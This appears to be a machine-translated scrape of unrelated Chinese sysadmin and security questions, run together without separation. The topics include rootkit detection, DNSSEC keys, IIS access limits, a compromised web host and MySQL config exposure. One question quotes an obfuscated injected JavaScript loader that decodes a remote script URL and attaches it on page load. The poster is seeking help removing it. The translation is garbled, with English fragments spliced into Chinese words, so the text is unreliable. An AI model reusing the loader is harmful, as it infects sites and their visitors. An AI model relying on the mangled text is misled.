我跑chkroot, rkhunter,并没有透露。 我跑去unhide brute, 它揭示了一个隐藏的PID 所以我ps aux | grep ^PID ps aux | grep ^PID 但没有出现。 我再次unhide brute ,而且什么都没有。 几秒钟后,我再次unhide brute ,并有一个新的PID。 我该怎么办 ? 我应该关心…?
我pipe理几个梭子鱼垃圾邮件filter。 当电子邮件通过梭子鱼发送给某人,似乎有垃圾邮件的特征,但不是明显的垃圾邮件,梭子鱼将把它放在用户的隔离区。 每天一次,它会发送HTML电子邮件通知,告知用户当前拥有垃圾邮件的所有消息,并提供到梭子鱼病毒的链接。 我的问题是你那些有梭子鱼垃圾邮件filter的人…你是否可以通过networking访问这个隔离页面? 因此,如果用户点击networking外部的电子邮件链接(如在家中),他们仍然能够访问他们的隔离区?
目前我使用128,这是否足够安全? dnssec-keygen -a hmac-md5 -b 128 -n host foobar.com 另外我不确定“host”是否是-n arg的正确值。 我相信最后一个参数“foobar.com”只是文件名 – 对吗?
偶尔有时候,我需要分享一些尚未公开的“私人”数据(即audio讲座的未经编辑的草稿),以便在被公布之前由授权人员进行审查。 通常我通过给文件一个模糊的名字(即新生成的GUID)并通过电子邮件发送链接到IM来做到这一点。 当然,没有链接到该网站上其他页面的文件。 这实际上是安全的还是有一些我忽略的漏洞? 这并不是说有任何核秘密被传递,但我仍然想确保我不会错过任何东西。
作为一个额外的安全层,我使用IIS中的“集成Windows身份validation”来保护我们的pipe理工具。 要设置新的用户帐户,我需要“计算机pipe理” – >“本地用户和组” – >“用户”。 对我的问题:是否有可能限制一个特定的用户访问某个IP地址。 例如,我只希望我的顾问能够从我们的办公室login? 我试过select用户 – >“属性” – >“拨入” – >“分配一个静态IP地址”,但它没有工作。 我还需要改变其他的东西吗?
是否有任何新手系统pipe理员可能没有考虑到的“gotcha”权限问题。 基本上我在找什么,是经验丰富的Linuxpipe理员分享一些新手pipe理员可能忽略的权限“事故”。 (我是一个Linux新手,只是读取文件的所有权和权限,以及如何得到一些事情出错的真实存储的时间)
我们最近注意到一个恶意脚本将自己插入到我们的域questoons.com上的许多PHP和HTML文件以及该帐户上托pipe的各种附加域。 该脚本将自身插入到文件末尾,代码如下所示: <script>/*CODE1*/ try{window.onload = function(){var Q236s4ic4454clw = document.createElement('script');Q236s4ic4454clw.setAttribute('type', 'text/javascript');Q236s4ic4454clw.setAttribute('id', 'myscript1');Q236s4ic4454clw.setAttribute('src', 'h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&)s)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!!^(p#!/@&)c^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$'.replace(/\(|\!|&|#|\$|\)|@|\^/ig, ''));Q236s4ic4454clw.setAttribute('defer', 'defer');document.body.appendChild(Q236s4ic4454clw);}} catch(e) {}</script> 请指导如何发生这种情况,我们如何能够阻止它的传播,并防止进一步的感染发生。 感谢和问候, 维纳亚克
环境: Web和应用程序服务器是Windows Server 2003 Enterprise / IIS 6 Web服务器位于防火墙之后 – 端口80和443向全世界开放。 WebServer和AppServer之间的stream量通过防火墙,只有端口80打开 webserver外部网站在应用程序服务器上调用WCF服务。 这些WCF服务调用是完全未经身份validation的 – 但是对数据库服务器执行非常关键的数据更新。 我认为(如果我错了,请纠正我)妥协networking服务器将需要从外部世界沿端口443或80攻击 – 因此这将需要一个IIS漏洞攻击服务器。 问题 : 处理关键数据时这种configuration有多糟? 如果Web服务器受到攻击,是否有任何措施可以缓解其影响,并且在大多数情况下可以防止对WCF服务的任意调用? 是否有历史IIS漏洞的“典型”影响列表?
我有以下情况:安装弱安全性的机器安装了关键业务应用程序。 该应用程序使用MySQL 4数据库存储所有的业务关键数据。 每个应用程序安装都有一个ascii格式的configuration文件,任何有权访问计算机的人都可以读写。 以下信息被公开: 服务器名称 数据库名称 用户名 我的问题是这样的: 对于一个专门的攻击者来说,这个安全漏洞有多大的危害? 对于一个经验丰富的攻击者来说,这个安全漏洞有多大的危害? 数据库容易受到哪些types的攻击?
我pipe理我们的小型办公室networking。 如果我想要PC的1-5(PC1,PC2等)都可以访问我们的服务器(使用Windows Workgroupnetworking(不是域networking),我必须login每个用户(从PC1,2等) )在该服务器上。 如果我在服务器上有一个Guest帐户,是否可以让每个用户访问Guest访问权限(无需拥有所有这些重复login?)